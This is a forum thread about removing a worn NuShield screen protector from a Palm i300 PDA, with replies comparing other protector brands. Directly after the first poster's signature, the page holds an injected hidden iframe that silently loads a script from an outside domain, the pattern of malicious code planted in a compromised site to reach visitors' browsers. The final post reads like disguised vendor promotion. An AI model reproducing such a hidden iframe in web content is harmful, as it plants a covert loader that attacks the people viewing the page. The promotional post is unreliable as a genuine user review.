+ Reply to Thread

Question nushield removal ?

Ok, I've had a nushield protector on my i300 since early June, and the screen is starting to look nasty. How do I remove the nushield protector ? There's nothing on their website or anywhere else on the web that I've seen. I tried using tape to pull the protector off but that didn't pull it up enough. I'm afraid of trying other methods and damaging the thing.

So, anyone ever removed one of these suckers ? Mine has a bunch of scratches on it, particularly in the graffiti area.

As a side note, my stylus (the one that came with the i300) seems to scratch the screen/protector really easily - I'll go to write/drag something and occasionally instead of the smooth stylus-to-screen feeling I'll get this horrible scratching action. If it wasn't for that I wouldn't need to change the protector. Now the graffiti area is so scarred with scratches that it's just plain uncomfortable to use.

Drew<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

dont know how best to get it off, but if/when you do, try using the WriteRight style screen protectors. A friend has one on his palm, and it provides a textured surface...gives you the feeling of writing on paper, allows for slightly more control. Also, since the entire sticker is completely textured, scratches fail to show up as quickly/easily as other, smoother style stickers would probably show. Good luck

I had problems with the textured surface ones. Outdoors, the texture made it harder to see the screen. Once I shifted to the Companionlink smooth protector, the screen got significantly easier to read outdoors.

FWIW

My NuShield is also ready for replacement but it seems to slide around fairly easily with moderate finger pressure on the screen. The most leeway is downwards, towards the Palm buttons. Try holding it upside down and using your thumbs to push the 'shield' up a quarter inch or so. I think that way you'll get a decent friction-pressure combination.

I tried the Writerights - the NuShield is much easier to read and provides some of the 'paper' feel without the bumps. I have a couple scratches but nothing terrible, and it's strong enough that it's been fine in my pocket without a case for months now.

Thumbs up I found my favorite screen protector!

I have tried all the major names in screen protectors (and had to cut most of them down to fit) and was dissatisfied with the loss of clarity and how easily they scratched. After a few days, some of them made my I300 look like an old and beat-up piece of junk!

After reading the reviews of the G2 from www.pdascreenprotectors.com, I had to try them. You can see the reviews linked on their website for more info.

I can now recommend a product that is so clear, you can hardly tell its on the screen. And using it outside is amazingly clear, unlike the rest. After several months, there isn't a single scratch on it and it still looks like new. Great product!

The G2 is available for the I300 = you won't have to cut it down to fit.